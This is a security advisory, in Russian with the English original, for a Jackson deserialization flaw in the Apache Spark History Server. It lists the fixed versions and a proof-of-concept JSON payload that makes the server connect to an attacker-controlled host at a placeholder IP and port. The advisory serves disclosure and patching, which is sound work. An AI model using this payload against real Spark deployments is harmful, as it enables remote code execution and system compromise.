Эта проблема затрагивает Apache Spark: до версий 3.5.7 и 4.0.1. Пользователям рекомендуется выполнить обновление до версии 3.5.7 или 4.0.1 и выше, что устраняет проблему. Резюме
Apache Spark 3.5.4 и более ранние версии содержат уязвимость выполнения кода в веб-интерфейсе Spark History из-за чрезмерно разрешающей десериализации Джексоном данных журнала событий.
Это позволяет злоумышленнику, имеющему доступ к каталогу журналов событий Spark, внедрять вредоносные полезные данные JSON, которые запускают десериализацию произвольных классов, обеспечивая выполнение команд на хосте, на котором работает сервер истории Spark. Подробности
Уязвимость возникает из-за того, что сервер истории Spark использует полиморфную десериализацию Джексона с @JsonTypeInfo.Id.CLASS для объектов SparkListenerEvent, что позволяет злоумышленнику указывать произвольные имена классов в событии JSON. Такое поведение позволяет создавать экземпляры непреднамеренных классов, таких как org.apache.hive.jdbc.HiveConnection, которые могут выполнять сетевые вызовы или другие вредоносные действия во время десериализации.
Злоумышленник может воспользоваться этим, внедрив созданный контент JSON в файлы журнала событий Spark, которые затем сервер истории десериализует при запуске или при загрузке журналов событий. Например, злоумышленник может заставить сервер истории открыть соединение JDBC с удаленным сервером, контролируемым злоумышленником, продемонстрировав возможность удаленного внедрения команд. Доказательство концепции:
1.
Запустите Spark с включенным ведением журнала событий и записью в доступный для записи каталог (spark-logs).
2. Вставьте следующий JSON в начало файла журнала событий:
{
"Событие": "org.apache.hive.jdbc.HiveConnection",
"uri": "jdbc:hive2://<IP>:<PORT>/",
"информация": {
"hive.metastore.uris": "thrift://<IP>:<PORT>"
}
}
3. Запустите сервер истории Spark с журналами, указывающими на измененный каталог.
4.
Сервер истории Spark инициирует соединение JDBC с сервером злоумышленника, подтверждая внедрение. Воздействие
Злоумышленник, имеющий доступ на запись в журналы событий Spark, может выполнить произвольный код на сервере, на котором работает сервер истории, потенциально ставя под угрозу всю систему.
Показать оригинальное описание (EN)
This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue. Summary Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server. Details The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization. The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability. Proof of Concept: 1. Run Spark with event logging enabled, writing to a writable directory (spark-logs). 2. Inject the following JSON at the beginning of an event log file: { "Event": "org.apache.hive.jdbc.HiveConnection", "uri": "jdbc:hive2://<IP>:<PORT>/", "info": { "hive.metastore.uris": "thrift://<IP>:<PORT>" } } 3. Start the Spark History Server with logs pointing to the modified directory. 4. The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection. Impact An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.